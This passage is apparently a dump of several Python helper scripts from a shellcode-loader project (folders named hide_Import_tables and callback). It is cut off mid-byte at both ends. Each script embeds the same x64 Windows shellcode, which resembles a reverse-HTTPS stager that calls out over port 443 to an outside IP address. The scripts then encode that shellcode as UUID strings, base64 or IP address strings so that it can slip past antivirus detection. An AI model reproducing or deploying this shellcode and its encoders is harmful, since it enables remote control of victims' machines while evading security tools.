f\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x4c\x79\x32\x66\x00\x16\x18\x19\x7f\xcf\x26\x02\x0c\xf1\x94\x1a\x0a\x74\xb2\xe1\x19\xfd\xfd\x5f\xed\xe6\x21\xde\xcd\xe3\x2c\x0e\xc7\x64\xb2\x38\xb4\x66\x03\xbb\xe5\x74\x99\xa5\x4b\x97\xa9\x63\x91\x01\x65\x05\x7c\x94\xa1\xe9\x26\x87\x59\x70\xda\x68\xe2\x5f\xf8\x23\xde\x25\x99\xf9\x62\xef\x5f
\x61\xf1\x32\xfd\xab\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x71\x64\x65\x73\x6b\x20\x32\x2e\x34\x2e\x31\x32\x36\x33\x2e\x32\x30\x33\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x0d\x0a\x00\x7d\x0a\x12\x0c\x48\xa8\x65\xa9\x66\xba\xca\x2f\x81\xdb\xc5\x30\xdb\x66\x81\xe7\xfb\x7c\x18\x4e\x81\xba\x3d\xd0\x33\x80\x49\xdf\x04\xdb\x34\xb2\x32\xc6\xa2\x0d\x41\xd7\x93\xcd\x7d\x9d\xd9\x43\x86\x5c\x72\x66\x16\xe8\x44\x95\x9f\x83\x63\xce\x2f\xd1\xb1\x99\xe6\xce\xc9\xd6\xa7\x6c\x6d\x40\x22\x5c\x38\xc6\x4f\xde\x3a\x83\x84\x72\xf9\x1a\x95\x3b\x53\x53\xc8\x71\xea\x07\xba\x9e\x98\xa6\x6d\x37\xd5\xfa\x3b\xb6\x25\x5f\x48\x3b\x68\x52\x1e\xab\x44\xcb\x33\x3d\xa1\x44\x8f\x58\x48\xf0\x54\xd9\xa5\x5a\x1d\x04\xa5\x28\x9b\xe5\xc3\x7a\x36\x13\x1c\x11\xcb\x55\xf9\xbd\x7a\xec\xce\x6c\x87\xe5\x94\x09\x44\xf4\x6f\x06\xb9\x0f\xdf\xbf\xcc\x28\x7b\x10\x1d\x86\x4a\xd6\xa7\xf2\xec\x21\xd7\xfa\x1c\x00\x54\x6a\x3b\xc8\x62\xc5\xa1\xde\x80\x1c\xd3\x44\xb3\x88\xf8\xa9\xbd\xf8\xab\xba\x8b\x42\x84\x9e\xa2\x71\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' # shellcode 17 | u = convertToUUID(buf) 18 | print(str(u).replace("'","\"")) -------------------------------------------------------------------------------- /hide_Import_tables/v0.1/trans.py: -------------------------------------------------------------------------------- 1 | import uuid 2 
| 3 | def convertToUUID(shellcode): 4 | if len(shellcode)%16 !=0: 5 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 6 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 7 | shellcode += addNullbyte 8 | 9 | uuids = [] 10 | for i in range(0,len(shellcode),16): 11 | uuidString = str(uuid.UUID(bytes_le=shellcode[i:i+16])) 12 | uuids.append(uuidString.replace("'","\"")) 13 | return uuids 14 | 15 | if __name__ == '__main__': 16 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\
x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x4c\x70\x58\x49\x00\xdf\xe6\x55\x0b\xc7\x0b\x19\x4d\xb4\x74\x8f\x06\x89\x8a\x62\x17\x8f\xc2\x8a\xc8\x21\xa0\x1b\x2e\x3f\xf9\xcf\x4b\x32\x72\xe2\xe9\x74\x2d\x6c\x32\xf5\xd2\x0e\xca\xb1\x8a\x0a\xc6\xf2\xf8\xec\xe0\x5c\x80\x5e\x86\x62\x24\x8d\x0a\x10\x51\xd6\xda\xaf\x84\xce\x8a\x8a\xa7\xfa\x78\x18\x97\xbc\xb0\x50\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x47\x57\x4a\x53\x29\x0d\x0a\x00\xce\x75\x8d\xfb\x7d\xdb\xd6\x05\x1b\xcb\xc5\x45\xfa\x7e\x21\x5f\xe5\xc3\x0b\x88\xf3\x22\xf4\x2b\xf7\x55\xfa\x5c\x6e\xbd\xde\x31\x99\xbb\xef\x1a\x1e\xee\xb9\x3a\xb1\x56\xbc\xb1\x46\x56\x80\xb3\xf1\x7b\x88\x93\xa2\x76\x7a\x59\x95\x4a\x67\x06\x2d\xcb\x36\xb2\x51\x85\x83\xb8\xfc\x59\x57\xe8\x5b\x21\x57\xa2\x1f\xc0\x5f\x03\x10\xe1\x85\x04\xb0\x60\xe6\xe7\xa7\x98\x52\x32\x40\x44\x47\xdb\x61\xb7\x11\x42\x5a\xf2\x20\x06\xb7\xc6\x9a\x26\xed\x5e\x9a\xfd\x87\x9e\x73\x66\xa9\xe9\xf5\x95\xc7\x74\x63\x4d\x2d\xab\x13\x00\xf5\xe6\x80\x00\xf4\x69\xc8\x55\xde\xe6\x9d\x77\x2c\xb7\x1c\xaf\x22\xe9\xa7\xfc\x1c\x37\xe7\xe9\xd6\xd1\x8e\xfe\x30\xae\x21\x9f\xdd\xe9\xdc\x62\xbc\xfd\xf2\x68\x93\xee\x61\x4c\xe1\x39\x0e\x0c\xc6\x37\xa3\xe3\xa4\x27\xb1\x72\xec\xb0\xf3\xfb\x9c\x79\x79\xf5\x60\x77\x73\xcd\xc5\x73\x61\x01\x09\xb5\xc3\x75\x70\xa9\xb1\x4e\xa2\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\
x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' # shellcode 17 | u = convertToUUID(buf) 18 | print(str(u).replace("'","\"")) -------------------------------------------------------------------------------- /callback/v0.2/trans.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import uuid 3 | 4 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\
xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x6c\x7a\x36\x41\x00\xf7\x60\x59\x6d\x9c\x78\x07\x14\x7f\x90\x3c\xb5\xf2\xd1\x99\x9d\x91\xc2\x66\xc4\x6e\x17\x3f\xb8\x43\xb3\xee\x45\x28\xef\x8f\xce\x7b\x5b\x06\x91\x2c\x2e\xa4\x2a\xe7\x68\xde\xb9\xf2\x82\xde\xae\x9e\x91\xe7\xf5\x30\x38\x9f\x6b\xe4\x40\x5a\x07\xbc\xcf\x15\x91\x99\xe0\x5f\x94\x3e\x00\xa5\x0f\xfd\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x41\x52\x4a\x53\x29\x0d\x0a\x00\x71\xe4\xfb\xc4\x3a\xc6\x6a\x35\x0e\x94\xd6\xd4\x36\x78\xf7\x49\x9d\x55\x26\x95\xac\x46\xfb\x05\x6a\xf6\x58\x5c\x9f\x31\x8b\xee\x43\x2e\xf9\xf0\x8c\x6a\x48\x6a\xf0\xe8\x89\x88\x15\x32\x17\x6b\xe5\x58\x01\xb7\x6c\xb0\x96\xc4\x7f\x49\x51\x34\x28\x5e\xb9\x98\x7c\x4d\xba\x1c\xe2\x35\x45\x25\x71\xda\x4b\x1f\x7f\x67\xb7\x7d\x9e\xb0\xa8\x7f\x0b\xed\x8a\x5c\x12\xa9\x62\x5a\x09\x81\xb7\xb9\x10\xb3\x8b\xdd\x98\xe9\x6f\x62\x1e\xa9\x89\x2f\xfa\x9f\x26\x66\x16\xb1\x3b\xd0\xb0\xc3\x32\xb1\xe0\x0d\xf9\xa3\x41\x00\x23\xd0\x71\x71\xc0\x1a\x73\xf1\x40\x04\x3b\xae\x57\x16\x7c\x42\x0c\x48\x31\x97\x60\x7a\xac\x60\xc5\xc7\x85\x62\xba\xbc\xef\xfe\x62\xa4\x7d\x0e\x79\x75\x4b\x47\xb8\x6d\x42\x48\xdf\x4a\x33\x64\xd0\x86\x3b\x29\xb1\x9b\xde\xdc\x9a\xb6\xcc\x1c\x36\xde\x51\x0c\x4f\xa4\x83\x85\x85\xaf\x7d\x23\x1c\x56\xdb\x86\xbe\x91\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\
x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' 5 | 6 | def convertToUUIDToBase64(shellcode): 7 | if len(shellcode)%16 !=0: 8 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 9 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 10 | shellcode += addNullbyte 11 | 12 | uuids = [] 13 | for i in range(0,len(shellcode),16): 14 | uuidString = str(uuid.UUID(bytes_le=shellcode[i:i+16])) 15 | uuids.append(base64.b64encode(uuidString.replace("'","\"").encode('utf-8'))) 16 | return uuids 17 | 18 | 19 | u = convertToUUIDToBase64(buf) 20 | print([str(i, 'utf-8') for i in u]) -------------------------------------------------------------------------------- /hide_Import_tables/v0.2/trans.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import uuid 3 | 4 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x5
6\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x6c\x7a\x36\x41\x00\xf7\x60\x59\x6d\x9c\x78\x07\x14\x7f\x90\x3c\xb5\xf2\xd1\x99\x9d\x91\xc2\x66\xc4\x6e\x17\x3f\xb8\x43\xb3\xee\x45\x28\xef\x8f\xce\x7b\x5b\x06\x91\x2c\x2e\xa4\x2a\xe7\x68\xde\xb9\xf2\x82\xde\xae\x9e\x91\xe7\xf5\x30\x38\x9f\x6b\xe4\x40\x5a\x07\xbc\xcf\x15\x91\x99\xe0\x5f\x94\x3e\x00\xa5\x0f\xfd\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x41\x52\x4a\x53\x29\x0d\x0a\x00\x71\xe4\xfb\xc4\x3a\xc6\x6a\x35\x0e\x94\xd6\xd4\x36\x78\xf7\x49\x9d\x55\x26\x95\xac\x46\xfb\x05\x6a\xf6\x58\x5c\x9f\x31\x8b\xee\x43\x2e\xf9\xf0\x8c\x6a\x48\x6a\xf0\xe8\x89\x88\x15\x32\x17\x6b\xe5\x58\x01\xb7\x6c\xb0\x96\xc4\x7f\x49\x51\x34\x28\x5e\xb9\x98\x7c\x4d\xba\x1c\xe2\x35\x45\x25\x71\xda\x4b\x1f\x7f\x67\xb7\x7d\x9e\xb0\xa8\x7f\x0b\xed\x8a\x5c\x12\xa9\x62\x5a\x09\x81\xb7\xb9\x10\xb3\x8b\xdd\x98\xe9\x6f\x62\x1e\xa9\x89\x2f\xfa\x9f\x26\x66\x16\xb1\x3b\xd0\xb0\xc3\x32\xb1\xe0\x0d\xf9\xa3\x41\x00\x23\xd0\x71\x71\xc0\x1a\x73\xf1\x40\x04\x3b\xae\x57\x16\x7c\x42\x0c\x48\x31\x97\x60\x7a\xac\x60\xc5\xc7\x85\x62\xb
a\xbc\xef\xfe\x62\xa4\x7d\x0e\x79\x75\x4b\x47\xb8\x6d\x42\x48\xdf\x4a\x33\x64\xd0\x86\x3b\x29\xb1\x9b\xde\xdc\x9a\xb6\xcc\x1c\x36\xde\x51\x0c\x4f\xa4\x83\x85\x85\xaf\x7d\x23\x1c\x56\xdb\x86\xbe\x91\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' 5 | 6 | def convertToUUIDToBase64(shellcode): 7 | if len(shellcode)%16 !=0: 8 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 9 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 10 | shellcode += addNullbyte 11 | 12 | uuids = [] 13 | for i in range(0,len(shellcode),16): 14 | uuidString = str(uuid.UUID(bytes_le=shellcode[i:i+16])) 15 | uuids.append(base64.b64encode(uuidString.replace("'","\"").encode('utf-8'))) 16 | return uuids 17 | 18 | 19 | u = convertToUUIDToBase64(buf) 20 | print(str([str(i, 'utf-8') for i in u]).replace("'",'"')) -------------------------------------------------------------------------------- /hide_Import_tables/v0.3/trans.py: -------------------------------------------------------------------------------- 1 | import ipaddress 2 | 3 | buf = 
b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x4c\x70\x58\x49\x00\xdf\xe6\x55\x0b\xc7\x0b\x19\x4d\xb4\x74\x8f\x06\x89\x8a\x62\x17\x8f\xc2\x8a\xc8\x21\xa0\x1b\x2e\x3f\xf9\xcf\x4b\x32\x72\xe2\xe9\x74\x2d\x6c\x32\xf5\xd2\x0e\xca\xb1\x8a\x0a\xc6\xf2\xf8\xec\xe0\x5c\x80\x5e\x86\x62\x24\x8d\x0a\x10\x51\xd6\xda\xaf\x84\xce\x8a\x8a\xa7\xfa\x78
\x18\x97\xbc\xb0\x50\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x47\x57\x4a\x53\x29\x0d\x0a\x00\xce\x75\x8d\xfb\x7d\xdb\xd6\x05\x1b\xcb\xc5\x45\xfa\x7e\x21\x5f\xe5\xc3\x0b\x88\xf3\x22\xf4\x2b\xf7\x55\xfa\x5c\x6e\xbd\xde\x31\x99\xbb\xef\x1a\x1e\xee\xb9\x3a\xb1\x56\xbc\xb1\x46\x56\x80\xb3\xf1\x7b\x88\x93\xa2\x76\x7a\x59\x95\x4a\x67\x06\x2d\xcb\x36\xb2\x51\x85\x83\xb8\xfc\x59\x57\xe8\x5b\x21\x57\xa2\x1f\xc0\x5f\x03\x10\xe1\x85\x04\xb0\x60\xe6\xe7\xa7\x98\x52\x32\x40\x44\x47\xdb\x61\xb7\x11\x42\x5a\xf2\x20\x06\xb7\xc6\x9a\x26\xed\x5e\x9a\xfd\x87\x9e\x73\x66\xa9\xe9\xf5\x95\xc7\x74\x63\x4d\x2d\xab\x13\x00\xf5\xe6\x80\x00\xf4\x69\xc8\x55\xde\xe6